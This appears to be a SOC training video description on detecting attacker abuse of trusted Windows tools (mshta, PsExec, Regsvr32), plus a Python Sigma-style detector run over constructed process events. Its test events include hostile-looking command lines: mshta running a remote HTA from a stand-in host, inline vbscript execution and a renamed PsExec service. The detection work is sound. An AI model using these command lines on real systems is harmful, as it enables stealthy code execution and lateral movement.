SOC Analyst Training: How SOC analysts can detect threat actors abusing legit tools
Good apps gone bad? 😈 Security researchers Ryan Robinson and Nicole Fishbein dig in.

As a SOC analyst, you need to be familiar with how trusted tools are misused by attackers. You also need to know which detection methods will be effective in your environment and will trigger alerts when attackers are using legitimate tools. Detecting attacker use of legitimate applications while avoiding false positive alerts and alert fatigue is hard: because these applications are frequently used by the operating system itself and by endpoint users, it is difficult to tell when an application is being abused by an attacker and to raise an alert only then.

Check out our blog for more about detecting and hunting legitimate applications that are being used for malicious purposes: https://www.intezer.com/blog/incident...

Timestamps:
2:00 Life hack examples: using (or misusing!) items in completely new ways
5:12 Is the tool in the hands of a trusted user, or deployed by someone with malicious intent?
7:18 Detecting malicious mshta.exe (because mshta is a legitimate, signed binary, it gives attackers a way to execute arbitrary script stored on a remote server while bypassing browser security settings)
12:16 Using Sigma to create a detection rule that catches misuse of mshta
16:35 How malicious actors abuse PsExec, a command-line utility for admins
21:55 Detecting PsExec with Sigma based on behavior
25:58 The struggles of false positives
27:51 Squiblydoo: abusing the Regsvr32 command-line utility
37:29 Offensive security tools: a closer look at Pafish (Paranoid Fish)
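To make the Sigma detection idea from the mshta and PsExec chapters concrete, here is an added example that is not part of the video or of Intezer's material. It implements a minimal Sigma-style matcher in Python (a stand-in for a real Sigma backend such as sigma-cli or pySigma, not those tools) and runs two rules over constructed Sysmon Event ID 1 style process-creation events. The events, the paths, the renamed PsExec binary name and the allow-listed host `intranet.example.local` used in the false-positive filter are all assumptions made for illustration.

```python
"""Sigma-style detection of mshta and PsExec abuse over constructed process events.

Added example, not code from the video or from Sigma itself. Rules are Python
dicts that mirror Sigma's `detection:` block; events mimic Sysmon Event ID 1
fields. Every event, host and path below is constructed for illustration.
"""
from __future__ import annotations

from typing import Any

# Constructed process-creation events (Sysmon Event ID 1 style). Not real telemetry.
EVENTS: list[dict[str, Any]] = [
    # 1: mshta pulling an HTA from a remote server, spawned by PowerShell
    {"id": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://cdn.example.net/update.hta",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "MSHTA.EXE"},
    # 2: inline vbscript: protocol handler, nothing written to disk
    {"id": 2, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""calc.exe"":close")',
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "MSHTA.EXE"},
    # 3: user double-clicks a local .hta from Explorer (benign under this rule)
    {"id": 3, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\Desktop\report.hta",
     "ParentImage": r"C:\Windows\explorer.exe",
     "OriginalFileName": "MSHTA.EXE"},
    # 4: remote HTA from an assumed allow-listed internal host (tuned-out false positive)
    {"id": 4, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://intranet.example.local/portal.hta",
     "ParentImage": r"C:\Windows\explorer.exe",
     "OriginalFileName": "MSHTA.EXE"},
    # 5: stock PsExec service binary started by the Service Control Manager
    {"id": 5, "Image": r"C:\Windows\PSEXESVC.exe",
     "CommandLine": r"C:\Windows\PSEXESVC.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "OriginalFileName": "psexesvc.exe"},
    # 6: PsExec service renamed on disk (assumed name); PE OriginalFileName still gives it away
    {"id": 6, "Image": r"C:\Windows\svchost_helper.exe",
     "CommandLine": r"C:\Windows\svchost_helper.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "OriginalFileName": "psexesvc.exe"},
    # 7: unrelated benign process
    {"id": 7, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe",
     "OriginalFileName": "NOTEPAD.EXE"},
]

# Rules shaped like Sigma `detection:` blocks: `Field|modifier` keys, list values OR'ed,
# keys inside one selection AND'ed, and `condition` combining the named selections.
RULES: dict[str, dict[str, Any]] = {
    "mshta_remote_or_inline_script": {
        "selection": {
            "Image|endswith": "\\mshta.exe",
            "CommandLine|contains": ["http://", "https://", "javascript:", "vbscript:", "about:"],
        },
        # Assumed allow-list for tuning: an internal portal that legitimately serves HTAs.
        "filter": {"CommandLine|contains": "https://intranet.example.local/"},
        "condition": "selection and not filter",
    },
    "psexec_service_execution": {
        "selection_service": {"Image|endswith": "\\PSEXESVC.exe",
                              "ParentImage|endswith": "\\services.exe"},
        "selection_renamed": {"OriginalFileName": "psexesvc.exe"},
        "condition": "selection_service or selection_renamed",
    },
}


def field_matches(event: dict[str, Any], key: str, expected: Any) -> bool:
    """Evaluate one `Field|modifier: value(s)` pair, case-insensitively like Sigma."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    for candidate in expected if isinstance(expected, list) else [expected]:
        cand = str(candidate).lower()
        if (modifier == "" and value == cand) or \
           (modifier == "contains" and cand in value) or \
           (modifier == "endswith" and value.endswith(cand)) or \
           (modifier == "startswith" and value.startswith(cand)):
            return True
    return False


def selection_matches(event: dict[str, Any], selection: dict[str, Any]) -> bool:
    """All field tests inside one selection map must hold."""
    return all(field_matches(event, k, v) for k, v in selection.items())


def condition_holds(event: dict[str, Any], detection: dict[str, Any]) -> bool:
    """Support `a and b`, `not a` and `a or b` (OR binds loosest); enough for these rules."""
    for clause in detection["condition"].split(" or "):
        clause_ok = True
        for term in clause.split(" and "):
            negate = term.startswith("not ")
            name = term[4:] if negate else term
            if selection_matches(event, detection[name]) == negate:
                clause_ok = False
                break
        if clause_ok:
            return True
    return False


def run_rules(events: list[dict[str, Any]], rules: dict[str, dict[str, Any]]) -> dict[str, list[int]]:
    """Return {rule_name: [event ids that fired]}."""
    hits: dict[str, list[int]] = {name: [] for name in rules}
    for event in events:
        for name, detection in rules.items():
            if condition_holds(event, detection):
                hits[name].append(event["id"])
    return hits


if __name__ == "__main__":
    for rule, ids in run_rules(EVENTS, RULES).items():
        print(f"{rule}: events {ids}")
```

Event 3 (a local .hta opened from Explorer) and event 4 (the allow-listed internal host) do not fire, which is the false-positive tuning the video spends time on; event 6 shows why a PsExec rule keyed only on the file name `PSEXESVC.exe` misses a renamed binary, while the PE `OriginalFileName` field still catches it.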
